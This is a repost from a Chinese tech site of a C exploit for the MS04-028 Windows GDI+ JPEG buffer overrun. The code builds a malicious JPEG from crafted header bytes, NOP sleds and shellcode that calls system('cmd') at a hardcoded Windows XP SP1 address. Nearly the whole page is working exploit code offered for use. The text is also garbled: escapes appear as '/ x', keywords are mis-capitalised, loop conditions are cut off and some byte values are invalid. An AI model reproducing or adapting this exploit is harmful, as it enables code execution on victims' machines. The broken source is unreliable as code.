2. Tech
  3. Microsoft Windows GDI + JPG

Microsoft Windows GDI + JPG

xiaoxiao2021-03-06  60

Winjpegadminexp_ms04-028.sh attack program Windows 7.62 k 2004-09-23 DAV1D WINJPEG (GDI ) exp_ms04-028.c attack program Windows 7.40 k 2004-09-23 DAV1D WINJPEGBUFFEREXP_MS04-028.SH attack program Windows 4.36 k 2004-09- 23 DAV1D

// GDI Buffer Overrun Exploit by Fotoz

// Nb: The Headers Here Aren't Sample Headers Taken from a .jpg file,

// with the ff fe 00 01 INSERTED in Header1.

// Sample Shellcode Is Provided

// you can put approx. 2500 bytes of shellcode ... Who Needs That Much Anyway

// Tested on an unpatch WinXP SP1

#include

#include

Char shellcode [] =

"/ x68" // push

"cmd"

"/ x8b / xc4" // MOV EAX, ESP

"/ x50" // push eax

"/ xb8 / x44 / x80 / ​​xc2 / x77" // MOV EAX, 77C28044H (Address of System () on WinXP SP1)

"/ XFF / XD0" // Call EAX

;

Char Header1 [] =

"/ XFF / XD8 / XFF / XE0 / X00 / X10 / X46 / X00 / X01 / X02 / X00 / X00 / X64"

"/ x00 / x64 / x00 / x00 / x44 / x75 / x63 / x6b / x79 / x00 / x01 / x00"

"/ X04 / X00 / X00 / X00 / X0A / X00 / X00 / XFF / XEE / X00 / X0E / X41 / X64 / X6F / X62 / X65"

"/ x00 / x64 / xc0 / x00 / x00 / x00 / x01 / xff / xfe / x00 / x01 / x00 / x14 / x10 / x10 / x19"

"/ x12 / x19 / x27 / x17 / x17 / x27 / x32 / x26 / x32 / xdc / xb1 / xe7 / x70 / x26"

"/ x2e / x3e / x35 / x35 / x35 / x35 / x35 / x3e";

Char setnops1 [] =

"/ XE8 / X00 / X00 / X00 / X00 / X5B / X8D / X8B"

"/ x00 / x05 / x00 / x00 / x83 / xc3 / x12 / xc6 / x03 / x90 / x43 / x3b / xd9 / x75 / xf8";

Char setnops2 [] =

"/ X3E / XE8 / X00 / X00 / X00 / X00 / X5B / X8D / X8B"

"/ x2f / x00 / x00 / x00 / x83 / xc3 / x12 / xc6 / x03 / x90 / x43 / x3b / xd9 / x75 / xf8";

Char Header2 [] =

"/ x44"

"/ x44 / x44 / x44 / x44 / x44 / x44 / x44 / x44 / x44 / x01 / x15 / x19 / x19"

"/ x20 / x1c / x20 / x26 / x18 / x26 / x20 / x26 / x36 / x44 / x36 / x2b / x2b"

"/ x36 / x44 / x35 / x42 / x44 / x44 / x44 / x44 / x44 / x44" "/ x44 / x44 / x44 / x44 / x44 / x44 / x44 / X44 / X44 / X44 / X44 / X44 / X44 / X44 / X44 / X44 "

"/ x44 / x44 / x44 / x44 / x44 / x44 / x44 / x44 / x44 / x44 / x44 / x44 / x44 / xff / xc0 / x00"

"/ X11 / X08 / X03 / X03 / X01 / X22 / X00 / X02 / X11 / X01" "

"/ XFF / XC4 / X00 / XA2 / X00 / X00 / X01 / X00 / X00 / X00 / X00 / X00 / X00"

"/ X00 / X00 / X00 / X00 / X00 / X03 / X05 / X00 / X06 / X01 / X01 / X01 / X01"

"/ x01 / x00 / x00 / x00 / x00 / x00 / x00 / x00 / x00 / x00 / x01 / x00 / x02"

"/ X03 / X02 / X02 / X04 / X05 / X02 / X03 / X06 / X04 / X05 / X02 / X06 / X01"

"/ x05 / x01 / x00 / x11 / x21 / x31 / x12 / x04 / x41 / x51 / x22 / x13 / x05"

"/ x61 / x32 / x91 / xa1 / xc1 / x52 / x23 / x14 / xb1 / xd1 / x62 / x15 / xf0"

"/ XE1 / X72 / X24 / X06 / X82 / X24 / XF1 / X92 / X43 / X53 / X34 / X16 / XA2 / XD2 / X63 / X83"

"/ X44 / X54 / X02 / X01 / X03 / X02 / X04 / X03 / X08 / X03 / X00 / X02 / X03"

"/ x01 / x00 / x00 / x00 / x00 / x01 / x41 / x12 / xf0 / x51 / x61 / x71"

"/ X81 / XD1 / XE1 / XF1 / X22 / X32 / X42 / X52 / XC1 / X62 / X13 / X72 / X92"

"/ XD2 / X03 / X23 / X82 / XFF / XDA / X00 / X0C / X03 / X01 / X00 / X02 / X11 / X03 / X11 / X00"

"/ X3F / X00 / X0F / X90 / XFF / X00 / XBC / XDA / XB3 / X36 / X12 / XC3 / XD4 / XAD / XC6 / XDC"

"/ X45 / X2F / XB2 / X97 / XB8 / X9D / XCB / X63 / XFD / X26 / XD4 / XC6 / XD7 / X70 / XA4 / X19"

"/ X24 / X50 / XCA / X46 / X2B / XFC / XEB / X3B / XC7 / XC9 / XA5 / X4A / X8F / X69 / X26 / XDF"

"/ X6D / X72 / X4A / X9E / X27 / X6B / X3E / XE6 / X92 / X86 / X24 / X85 / X04 / XDB / XED / XA9"

"/ x64 / x8e / x19 / x1a / xa5 / xe7 / xb8 / x28 / x3d / x09 / xab / x5d / x5f"

"/ x16 / x4 / x4c / xed / x49 / x4c / xf5 / x01 / x1c / x49 / xab / x10 / x71"

"/ xa6 / x24 / x61 / x00 / x0f / x61 / xec / x34 / xa7 / x9c / x23 / xf4 / x96"

"/ XC6 / XE6 / XAF / XB7 / X80 / X76 / XEF / X93 / XF0 / XAA / X28 / X8A / X6B / XE0 / X18 / XC0"

"/ xa4 / x39 / x03 / xc2 / x90 / xdc / x43 / x31 / x91 / x23" "/ x35 / x35 / xa2 / x80 / ​​x4d / xfa / x72 / X31 / X07 / X9D / X03 / X70 / XA8 / X93 / X24 / X4F "

"/ x89 / x51 / x83 / x5e / xa4 / x2e / x7a / xc0 / x7d / xa9 / x8a / x10 / x61 / x64 / x07 / xfa"

"/ x88 / xc6 / x89 / x26 / xda / x0f / x20 / xbd / xb9 / x16 / xd2 / xa8 / XE8 / X91 / x3f / x1a"

"/ XE2 / XBA / XF0 / XBE / X74 / XAb / X1D / XC4 / X44 / X15 / X1A / X8A / X9C / XC7 / X2A / X6B"

"/ xa3 / x33 / x47 / x69 / xa9 / x64 / x68 / x26 / xc1 / x97 / x0b / xd6 / x86"

"/ X8B / X1B / X29 / XC6 / X87 / XE4 / XC7 / XFD / XCC / X53 / X11 / XA5 / X9C / X62 / X6A / XE5"

"/ x40 / x37 / x61 / x89 / xf6 / xb2 / x9c / x2a / x7c / xfd / x05 / x6a / x30 / x5f / x52 / x02"

"/ XEB / X72 / XBF / X7D / X74 / X4C / X23 / XB9 / X8F / XD8 / X78 / X67 / X54 / X59 / X64 / X47"

"/ XC5 / X75 / X21 / X18 / XD5 / XE3 / X58 / XE1 / X72 / X63 / XBF / X6D / XBD / XCB / XCA / X82"

"/ x65 / x54 / x4f / x0d / x95 / x86 / x76 / x-x82 / x55"

"/ XD7 / XA6 / XCE / XA7 / XAA / XDC / X6A / XF1 / XA9 / X8E / XE0 / X35 / XC1 / XCA / XA1 / XD4"

"/ x93 / xd2 / xd6 / x39 / x46 / x60 / xac / xc1 / x3b / x60 / xc9 / x70 / x84"

"/ X8E / XA1 / X9A / X9A / X20 / X01 / X94 / XCA / X08 / X91 / X53 / XDC / X01 / XB1 / XB5 / X12"

"/ x37 / x11 / xc6 / xc1 / xac / xf1 / x11 / xd4 / x9c / x6b / x3e / x69 / x76 / xf0 / x1d / x7b"

"/ x52 / x6d / xc9 / xa8 / x66 / x94 / xbb / x79 / x8f / x7e / xde / x17 / xfd / x4d / xab / x1e"

"/ X76 / X7A / Xa3 / X2B / XE2 / X50 / X06 / XB7 / X2C / XEB / X2A / X49 / XC9 / XEA / X4E / X9B"

"/ XE7 / XCA / XAF / X1E / XEC / X23 / XDC / X8B / XE1 / X6B / X5F / X1A / X9B / XE8 / X49 / X2E"

"/ X63 / XE5 / X03 / X32 / XCD / X19 / XB8 / X23 / X10 / X78 / X1F / X85 / X5C / X15 / X8C / X97"

"/ X84 / X9B / XDB / X15 / X35 / X9F / X16 / XE0 / X1E / X86 / XB9 / X8F / X97 / X11 / X4E / XDA"

"/ x35 / x02 / x45 / x25 / x93 / x17 / xb9 / x1b / xf5 / xc8 / x07 / xa9 / xe2"

"/ X2A / X76 / X01 / X95 / XAD / X81 / XB6 / X1C / X6A / XA2 / X38 / XD9 / XAE"

"/ XCA / X59 / X18 / X75 / X25 / XFF / X00 / X81 / XAE / XD8 / XE8 / XBB / X47 / X62 / XAC / XB7"

"/ xb6 / xa1 / x8d / x40 / x6d / x1e / xdb / x89 / x2f / x9d / xcd / x6b / x24" "/ x62 / x41 / x61 / x89 / xac / x2d / x8b / X3E / XB6 / X68 / XC0 / X63 / X73 / X70 / X6B / X6B "

"/ X6A / Xa1 / X7A / XAC / X56 / XE7 / X11 / X56 / X58 / XD4 / X13 / XA4 / X0B / XB6 / XEB / XB3"

"/ X3B / X47 / X22 / X3B / XD3 / X53 / X2E / XEA / X19 / X86 / X96 / XF7 / X03 / X83 / X52 / X9E"

"/ X54 / XAb / X7E / X33 / XCE / X93 / XB1 / X19 / X1C / XE9 / XDB / XAA / X35"

"/ xbf / x46 / x8d / xd4 / xd2 / x56 / xe0 / xe0 / x33 / xa1 / x4d / x0a / x4e / x3b / xb1 / xcd"

"/ xd4 / x06 / x 44 / x56 / x4a / xcd / x24 / x26 / xea / x6d / x7a / x87 / xdc / x3b / x60 / x6d"

"/ XFC / X2A / X36 / X1B / X97 / X04 / Xa0 / X11 / XEE / XE7 / X46 / X22 / X35"

"/ XD5 / X26 / X7C / X69 / X5F / X06 / XEC / X5A / XC5 / X0B / X46 / X70 / X27"

"/ XF2 / XD4 / X79 / XAD / X89 / XDA / X30 / X74 / XBD / X98 / XE4 / X68 / X58 / X86 / XE4 / X1B"

"/ X69 / XB9 / XDC / X2B / X30 / X87 / X48 / X53 / XC5 / X85 / X3B / XDD / X8A / X4E / XB5 / X42"

"/ XB2 / X8C / X6E / X2C / X01 / XF8 / X56 / X04 / X7B / XC9 / XA3 / X05 / X4F / XB4 / XD5 / XA2"

"/ XDF / XF6 / XFD / XC6 / XE2 / XA7 / X3C / X89 / X24 / XFE / XA9 / X5E / XC3 / XD4 / X6D / XF7"

"/ x85 / xc9 / x59 / x39 / x63 / x59 / x9b / xff / x00 / x06 / x1a / x5e / xfa / x69 / x0a / x46"

"/ X2B / XC0 / X9F / XC2 / X91 / X8B / XC9 / X40 / X58 / X16 / XBD / XF2 / XC0 / XD3 / X3B / X7F"

"/ x2d / xa9 / xbb / x2e / x49 / x42 / x6d / x52 / x70 / x39 / x62 / x9f / x08 / x73 / x6f / x20"

"/ x09 / x64 / x00 / x00 / xd5 / x97 / xbc / xdc / xf6 / x9c / xa7 / x66 / XEA"

"/ XD9 / XB6 / XDE / XE1 / XDE / XDE / XBA / XEC / X65 / XB4 / X44 / XD8 / XE3 / X8D / X52 / X2F"

"/ X36 / XCE / X74 / X33 / X7E / X9F / X2E / X22 / X99 / X8B / XC9 / X6D / X5A / X6D / X9E / XA8"

"/ X22 / XC7 / X0C / XA8 / X62 / X3D / X17 / X1D / X2F / XC8 / XFA / XD4 / XB0 / X9E / X14 / X45"

"/ X45 / X04 / XE1 / X96 / X04 / XE1 / XF1 / XA0 / X37 / X90 / X5B / XD8 / X7F / X81 / X57 / X1B"

"/ XC8 / XD5 / X48 / X27 / X0E / X3C / X6B / X3D / XCD / X44 / X15 / X92 / X41 / X25 / X94 / X82"

"/ XAE / X0E / X42 / X97 / X8D / X8C / X6D / XAE / X56 / XB8 / X26 / XD8 / X0F / XE3 / X43 / X93"

"/ X73 / X18 / X75 / X28 / XD7 / XF8 / XD5 / XFF / X00 / X74 / XE4 / X18 / XC2 / X82 / XAC / X6F" / X86 / X7F / X2A / X4C / XBE / XE5 / XFC / XD2 / X22 / XCC / X9A / X32 / XD1 / X7C / X7D / X68 ""

;

void main ()

{

File * fin, * fout;

Unsigned int i = 0, j = 0;

UNSIGNED CHAR C;

Mkdir ("Fotoz_JPEG");

Fout = FOPEN ("Fotoz_jpeg // Fotoz.jpg", "WB");

IF (! fout) {

Printf ("Error Opening Files / N);

Return;

}

Printf ("Shellcode Size IS% U Bytes / N", SIZEOF (Shellcode) -1);

For (i = 0; i

IF (0xD9FF == * (unsigned short *) & shellcode [i]) {

Printf ("Warning: Shellcode Contains Ffh D9H / N"

"FIX UR shellcode / n");

Return;

}

J = sizeof (header1) sizeof (setnops1) sizeof (header2) -3;

For (i = 0; i

FPUTC (Header1 [i], fout;

For (i = 0; I

FPUTC (SetNOPS1 [I], Fout);

For (i = 0; i

FPUTC (Header2 [i], fout;

For (i = j; i <0x63c; i ) FPUTC (0x90, fout); // stuff in a couple of nops

J = I;

For (i = 0; i

FPUTC (Shellcode [i], fout);

For (i = i j; i <0x1000-sizeof (setnops2) 1; i )

FPUTC (0x90, fout); // stuff NOPS

// (stuffing nops is becoming a bad habit)

For (j = 0; i <0x1000 && j

FPUTC (SetNOPS2 [J], Fout);

FPrintf (fout, "/ xff / xd9");

Fcloseall ();

}

转载请注明原文地址:https://www.9cbs.com/read-112473.html

9cbs

New Post(0)